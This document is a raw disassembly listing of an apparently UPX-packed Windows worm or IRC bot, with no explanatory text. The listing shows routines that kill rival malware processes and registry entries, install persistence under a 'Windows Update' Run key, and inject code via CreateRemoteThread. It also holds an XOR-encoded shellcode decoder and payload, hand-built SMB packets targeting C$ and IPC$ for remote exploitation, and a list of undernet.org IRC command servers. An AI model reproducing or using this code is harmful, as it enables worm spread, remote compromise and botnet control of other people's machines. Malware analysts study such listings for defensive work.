sub_311032D9 proc near ; DATA XREF: sub_31102E62+F7�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
mov ds:dword_31106030, esi
loc_311032E9: ; CODE XREF: sub_311032D9+24�j
call sub_31102C10
test eax, eax
jnz short loc_311032FF
push 1388h
call dword_311010D4 ; Sleep
jmp short loc_311032E9
; ---------------------------------------------------------------------------
loc_311032FF: ; CODE XREF: sub_311032D9+17�j
lea eax, [ebp+var_4]
push esi
push eax
call dword_31101148 ; InternetGetConnectedState
test [ebp+var_4], 2
push 50h
mov ds:dword_31106034, esi
pop ebx
mov ds:word_31106038, 96h
jz short loc_3110333A
mov ds:dword_31106034, 1
mov ebx, 12Ch
mov ds:word_31106038, 14h
loc_3110333A: ; CODE XREF: sub_311032D9+47�j
push edi
call sub_31102BD1
mov esi, eax
mov ax, word ptr ds:dword_31106028
push eax
call dword_31101184 ; ntohs
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 2
push eax
push offset loc_31105122
call sub_311037D4 ; memcpy
mov eax, esi
push 4
xor eax, 0AAAAAAAAh
pop edi
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push edi
push eax
push offset loc_31105124
call sub_311037D4 ; memcpy
add esp, 18h
cmp esi, 100007Fh
jz short loc_31103396
push esi
push offset sub_31103126
call sub_31102AEF
pop ecx
pop ecx
loc_31103396: ; CODE XREF: sub_311032D9+AE�j
; sub_311032D9+CB�j
push esi
push offset sub_3110318A
call sub_31102AEF
pop ecx
dec edi
pop ecx
jnz short loc_31103396
test ebx, ebx
pop edi
jle short loc_311033BE
mov esi, ebx
loc_311033AD: ; CODE XREF: sub_311032D9+E3�j
push 0
push offset sub_31103212
call sub_31102AEF
pop ecx
dec esi
pop ecx
jnz short loc_311033AD
loc_311033BE: ; CODE XREF: sub_311032D9+D0�j
push 0FFFFFFFFh
call dword_311010D4 ; Sleep
pop esi
xor eax, eax
pop ebx
leave
retn
sub_311032D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311033CC proc near ; CODE XREF: sub_31103565+85�p
; sub_311036D8+B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3110100C ; RegOpenKeyExA
test eax, eax
jnz short loc_311033FF
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31101010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31101014 ; RegCloseKey
loc_311033FF: ; CODE XREF: sub_311033CC+1C�j
pop ebp
retn
sub_311033CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31103401 proc near ; CODE XREF: sub_31102C74+33�p
; sub_31103565+76�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3110100C ; RegOpenKeyExA
test eax, eax
jz short loc_3110342D
push 1
pop eax
jmp short loc_31103457
; ---------------------------------------------------------------------------
loc_3110342D: ; CODE XREF: sub_31103401+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31101008 ; RegQueryValueExA
test eax, eax
jz short loc_3110344C
push 2
pop esi
loc_3110344C: ; CODE XREF: sub_31103401+46�j
push [ebp+arg_10]
call dword_31101014 ; RegCloseKey
mov eax, esi
loc_31103457: ; CODE XREF: sub_31103401+2A�j
pop esi
leave
retn
sub_31103401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3110345A proc near ; CODE XREF: sub_3110360C+96�p
; sub_311036D8+60�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31101000 ; RegCreateKeyExA
test eax, eax
jz short loc_31103483
push 1
pop eax
jmp short loc_311034AA
; ---------------------------------------------------------------------------
loc_31103483: ; CODE XREF: sub_3110345A+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31101004 ; RegSetValueExA
test eax, eax
jz short loc_3110349F
push 2
pop esi
loc_3110349F: ; CODE XREF: sub_3110345A+40�j
push [ebp+arg_4]
call dword_31101014 ; RegCloseKey
mov eax, esi
loc_311034AA: ; CODE XREF: sub_3110345A+27�j
pop esi
pop ebp
retn
sub_3110345A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311034AD proc near ; CODE XREF: sub_31103565+91�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_311010D0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31103561
loc_311034CD: ; CODE XREF: sub_311034AD+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_311034D6
dec esi
jns short loc_311034CD
loc_311034D6: ; CODE XREF: sub_311034AD+24�j
push 0
push 2
call sub_31103854 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31103561
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_311037DA ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_3110384E ; Process32First
test eax, eax
jz short loc_31103561
lea esi, [esi+ebx+1]
loc_3110351E: ; CODE XREF: sub_311034AD+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31101114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3110354E
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_311010E8 ; OpenProcess
push 0
push eax
call dword_31101060 ; TerminateProcess
loc_3110354E: ; CODE XREF: sub_311034AD+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31103848 ; Process32Next
test eax, eax
jnz short loc_3110351E
loc_31103561: ; CODE XREF: sub_311034AD+1A�j
; sub_311034AD+38�j ...
pop esi
pop ebx
leave
retn
sub_311034AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31103565 proc near ; CODE XREF: UPX0:31102E2B�p
var_134 = byte ptr -134h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
mov [ebp+var_2C], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_28], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_24], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_20], offset aBotLoader ; "Bot Loader"
mov [ebp+var_1C], offset aSystray ; "SysTray"
mov [ebp+var_18], offset aWinupdate ; "WinUpdate"
mov [ebp+var_14], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_10], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_C], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_4], eax
mov [ebp+var_8], 9
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_311035C7: ; CODE XREF: sub_31103565+A0�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_134]
push eax
push ebx
push edi
push esi
call sub_31103401
add esp, 14h
test eax, eax
jnz short loc_311035FE
push ebx
push edi
push esi
call sub_311033CC
lea eax, [ebp+var_134]
push eax
call sub_311034AD
add esp, 10h
loc_311035FE: ; CODE XREF: sub_31103565+80�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_311035C7
pop edi
pop esi
pop ebx
leave
retn
sub_31103565 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3110360C proc near ; CODE XREF: sub_311036D8+6A�p
; sub_311036D8+CA�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31103621
push [ebp+arg_0]
call dword_3110106C ; DeleteFileA
loc_31103621: ; CODE XREF: sub_3110360C+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_311010B8 ; GetSystemDirectoryA
test eax, eax
jz locret_311036D6
push esi
call dword_31101128 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31102B10
mov esi, dword_31101090
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31105DCC ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31101050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_311010D0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3110345A
add esp, 14h
push ds:dword_31106000
call dword_311010A4 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31101054 ; WinExec
push 1F4h
call dword_311010D4 ; Sleep
push 0
call dword_31101070 ; ExitProcess
pop esi
locret_311036D6: ; CODE XREF: sub_3110360C+23�j
leave
retn
sub_3110360C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311036D8 proc near ; CODE XREF: UPX0:31102E30�p
var_DC = byte ptr -0DCh
var_78 = byte ptr -78h
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
push edi
lea eax, [ebp+var_78]
push 63h
xor edi, edi
push eax
push edi
call dword_31101048 ; GetModuleFileNameA
test eax, eax
jz loc_311037A9
lea eax, [ebp+var_DC]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
mov esi, 80000002h
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
mov ds:dword_3110603C, edi
call sub_31103401
add esp, 14h
test eax, eax
jz short loc_3110374C
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push esi
call sub_3110345A
lea eax, [ebp+var_78]
push eax
push edi
call sub_3110360C
add esp, 1Ch
jmp short loc_311037A9
; ---------------------------------------------------------------------------
loc_3110374C: ; CODE XREF: sub_311036D8+4C�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call dword_3110104C ; lstrcmpiA
test eax, eax
jnz short loc_31103797
lea eax, [ebp+var_14]
push 14h
mov ebx, offset aClient ; "Client"
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push ebx
push edi
push esi
call sub_31103401
add esp, 14h
test eax, eax
jnz short loc_311037A9
push ebx
push edi
push esi
mov ds:dword_3110603C, 1
call sub_311033CC
add esp, 0Ch
jmp short loc_311037A9
; ---------------------------------------------------------------------------
loc_31103797: ; CODE XREF: sub_311036D8+87�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call sub_3110360C
pop ecx
pop ecx
loc_311037A9: ; CODE XREF: sub_311036D8+1D�j
; sub_311036D8+72�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_311036D8 endp
; =============== S U B R O U T I N E =======================================
sub_311037AE proc near ; CODE XREF: sub_31101248+2A�p
; sub_311014E6+27�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31101044 ; VirtualAlloc
retn
sub_311037AE endp
; =============== S U B R O U T I N E =======================================
sub_311037C2 proc near ; CODE XREF: sub_31101248+EB�p
; sub_311014E6+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31101040 ; VirtualFree
retn
sub_311037C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_311037D4 proc near ; CODE XREF: sub_31101248+4B�p
; sub_31101651+93�p ...
jmp dword_31101124
sub_311037D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_311037DA proc near ; CODE XREF: sub_31101582+20�p
; sub_31101651+128�p ...
jmp dword_31101120
sub_311037DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_311037E0 proc near ; CODE XREF: sub_31101651+9C�p
; sub_31101651+C5�p ...
jmp dword_3110111C
sub_311037E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_311037F0 proc near ; CODE XREF: sub_31101651+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31103810
loc_311037FC: ; CODE XREF: sub_311037F0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_311037FC
loc_31103810: ; CODE XREF: sub_311037F0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_311037F0 endp
; ---------------------------------------------------------------------------
align 10h
loc_31103820: ; CODE XREF: UPX0:31103861�j
; UPX0:31103878�j
jmp dword ptr locret_3110110E+2
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31103830 proc near ; CODE XREF: sub_31102280+5�p
; sub_31102463+5�p
jmp dword ptr loc_3110110C
sub_31103830 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31103836 proc near ; DATA XREF: sub_31102E62+A�o
jmp dword ptr loc_31101100
sub_31103836 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3110383C proc near ; CODE XREF: sub_31102FCD+10C�p
; sub_31102FCD+119�p ...
jmp dword_311010FC
sub_3110383C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31103842 proc near ; CODE XREF: sub_31102FCD+35�p
jmp dword_311010F8
sub_31103842 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31103848 proc near ; CODE XREF: sub_311034AD+AB�p
jmp dword_31101064
sub_31103848 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3110384E proc near ; CODE XREF: sub_311034AD+64�p
jmp dword_3110105C
sub_3110384E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31103854 proc near ; CODE XREF: sub_311034AD+2D�p
jmp dword_31101058
sub_31103854 endp
; ---------------------------------------------------------------------------
align 4
loc_3110385C: ; DATA XREF: sub_31102280�o
mov eax, offset dword_31103880
jmp loc_31103820
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-2F4h]
jmp loc_31101E68
; ---------------------------------------------------------------------------
loc_31103873: ; DATA XREF: sub_31102463�o
mov eax, offset dword_311038D8
jmp loc_31103820
; ---------------------------------------------------------------------------
align 10h
dword_31103880 dd 19930520h, 2, 311038A0h, 1, 311038B0h, 3 dup(0)
; DATA XREF: UPX0:loc_3110385C�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 311038C8h, 4 dup(0)
dd offset loc_31102374
dword_311038D8 dd 19930520h, 1, 311038F8h, 5 dup(0) dd 0FFFFFFFFh, 31103868h, 5C0h dup(0)
dword_31105000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_311011D9+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_311011C0+3�o
align 10h
loc_31105120: ; DATA XREF: sub_31101651+24E�o
; sub_31101651+260�o ...
jmp short loc_31105149
; ---------------------------------------------------------------------------
loc_31105122: ; DATA XREF: sub_311032D9+7F�o
adc dh, [esi]
loc_31105124: ; DATA XREF: sub_311032D9+9B�o
aad 0AAh
stosb
stosd
loc_31105128: ; CODE XREF: UPX0:loc_31105149�p
pop ebp
xor ecx, ecx
mov cx, 226h
lea esi, [ebp+5]
mov edi, esi
loc_31105134: ; CODE XREF: UPX0:31105145�j
mov al, [esi]
cmp al, 99h
jnz short loc_3110513F
inc esi
mov al, [esi]
sub al, 30h
loc_3110513F: ; CODE XREF: UPX0:31105138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_31105134
jmp short near ptr loc_31105152+1
; ---------------------------------------------------------------------------
loc_31105149: ; CODE XREF: UPX0:loc_31105120�j
call loc_31105128
bound esp, cs:[ebp+67h]
loc_31105152: ; CODE XREF: UPX0:31105147�j
db 2Eh
jno short near ptr dword_31105000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F78E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D571C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AE71h, 0F3C999C9h
dd 1065E368h, 99981C1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981C2Ch
dd 71C999C9h, 99C9996Eh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6471C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E4h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Ch, 2171C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1C2C669Bh, 99C99998h, 993F71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0E90414D9h, 99C99998h, 2871CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F5h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E42C66h, 0C999C999h, 98F52C66h, 0C999C999h
dd 0C9991071h, 0C999C999h, 96A6485Ah, 0F52C66C0h, 99C99998h
dd 99E071C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998E904h
dd 0CAC999C9h, 0C999FE71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C5h, 0F9C999C9h, 0ECEF133Bh, 0C999A8A8h, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 662A2DB4h, 0E6ACC91Eh, 0C9A5B7E7h, 9DB8BD9Ch
dd 71CDC982h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 181C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_311053FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31101651+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31105488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_31105534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31105614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31101651+BF�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_31105678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_311056E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31105788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_31105808 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_3110589C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31105908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31101651+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_3110597C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_31105A40 dd 1004600h dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_31105A7C dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Bh dup(0)
; DATA XREF: sub_31101651+41B�o
; sub_31101651+45D�o
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_31105AF8: ; DATA XREF: sub_31101651+44A�o
jmp short loc_31105B00
; ---------------------------------------------------------------------------
jmp short loc_31105B02
; ---------------------------------------------------------------------------
align 10h
loc_31105B00: ; CODE XREF: UPX0:loc_31105AF8�j
; DATA XREF: sub_31101651+5C�o
pop esp
pop esp
loc_31105B02: ; CODE XREF: UPX0:31105AFA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31105B0C dd 1CEC8166h dword_31105B10 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31101BB8+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31101BB8+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31101BB8+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31101BB8+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31101BB8+8�o
; sub_31102E62+98�o
align 4
aUterm11 db 'uterm11',0 ; DATA XREF: sub_31101C40:loc_31101D25�o
; UPX0:31102E01�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31101C40+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31101C40:loc_31101C87�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31101C40+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31101C40+18�o
align 10h
off_31105BC0 dd offset aMoscowAdvokat_ ; DATA XREF: sub_31102463+C0�r
; sub_31102463+112�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
